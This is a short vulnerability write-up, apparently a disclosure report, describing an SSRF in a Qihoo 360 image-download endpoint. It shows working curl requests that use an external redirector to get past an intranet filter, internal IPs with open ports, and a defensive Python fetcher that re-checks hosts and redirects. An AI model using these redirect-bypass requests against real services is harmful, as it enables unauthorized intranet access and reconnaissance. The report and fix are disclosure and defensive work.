Qihoo 360: an SSRF that bypasses the proxy's restriction on intranet access
First, the handy endpoint:
http://luyou.360.cn/activity/downLoadImg.php?url=https://ss0.bdstatic.com/5aV1bjqh_Q23odCf/static/superplus/img/logo_white.png&filetype=jpg&filename=360ProductSpecificationp-p1
The logic is to obtain the content of an image and then write it to another file.
Naturally, I wondered whether it could be used to reach the intranet. After trying, I found two restrictions:
1. the url must be http or https
2. the suffix must be an image extension
Okay, so let's try this:
http://luyou.360.cn/activity/downLoadImg.php?url=http://navsite.adsys.qihoo.net/?logo_white.png&filetype=jpg&filename=360ProductSpecificationp-p1
Still not working, so my guess is that the check is on the host: if the host corresponds to the intranet, no request is made.
After some thought I tried a redirect instead, and that worked:
http://luyou.360.cn/activity/downLoadImg.php?url=http://x1x2x3.duapp.com/l.php?url=http://10.121.95.65/?2017210000348ee.jpg&filetype=jpg&filename=360ProductSpecificationp-p1
➜ tmp curl "http://luyou.360.cn/activity/downLoadImg.php?url=http://x1x2x3.duapp.com/l.php?url=http://10.121.95.65/?%2378348ee.jpg&filetype=jpg&filename=360ProductSpecificationp-p1"
Welcome to nginx!
The following is a simple test:
We found that port 80 is open on several IP addresses:
10.121.95.65
10.121.95.168
10.121.95.160
10.121.95.222
➜ tmp curl "http://luyou.360.cn/activity/downLoadImg.php?url=http://x1x2x3.duapp.com/l.php?url=http://navsite.adsys.qihoo.net/?%2378348ee.jpg&filetype=jpg&filename=360ProductSpecificationp-p1"
<!DOCTYPE html>
Solution:
Filter
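As an added example (not code from the original writeup or from 360), here is a Python fetcher that implements the filter this section calls for and closes the gaps the bypass exploited: the image-suffix check is applied to the URL path rather than the raw string (so `/?logo_white.png` in the query no longer counts), the host is resolved and rejected if any address is non-public, and redirects are not followed by the HTTP client but re-validated hop by hop. The `fetch` and `resolve` callables are assumed to be injected by the caller so the logic can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = {"http", "https"}
IMAGE_SUFFIXES = (".png", ".jpg", ".jpeg", ".gif")
REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 3


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_target(url: str, resolve=socket.gethostbyname_ex) -> str:
    """Scheme, image suffix (on the path, not the query) and host checks.
    Raises ValueError on any failure; returns the URL unchanged otherwise."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("missing host")
    if not parts.path.lower().endswith(IMAGE_SUFFIXES):
        raise ValueError("path is not an image")
    # Resolve the name and check every address it maps to, not just the first.
    _, _, addrs = resolve(parts.hostname)
    for ip in addrs:
        if not is_public_address(ip):
            raise ValueError(f"{parts.hostname} maps to non-public {ip}")
    return url


def fetch_image(url: str, fetch, resolve=socket.gethostbyname_ex) -> bytes:
    """fetch(url) -> (status, headers, body) and must NOT follow redirects itself;
    every Location header is re-validated here before it is requested."""
    for _ in range(MAX_REDIRECTS + 1):
        validate_target(url, resolve)
        status, headers, body = fetch(url)
        if status not in REDIRECT_CODES:
            return body
        url = urljoin(url, headers.get("Location", ""))
    raise ValueError("too many redirects")
```

Resolving and then connecting by name still leaves a DNS-rebinding window; a production fetcher should connect to the address it validated rather than letting the client resolve the name a second time.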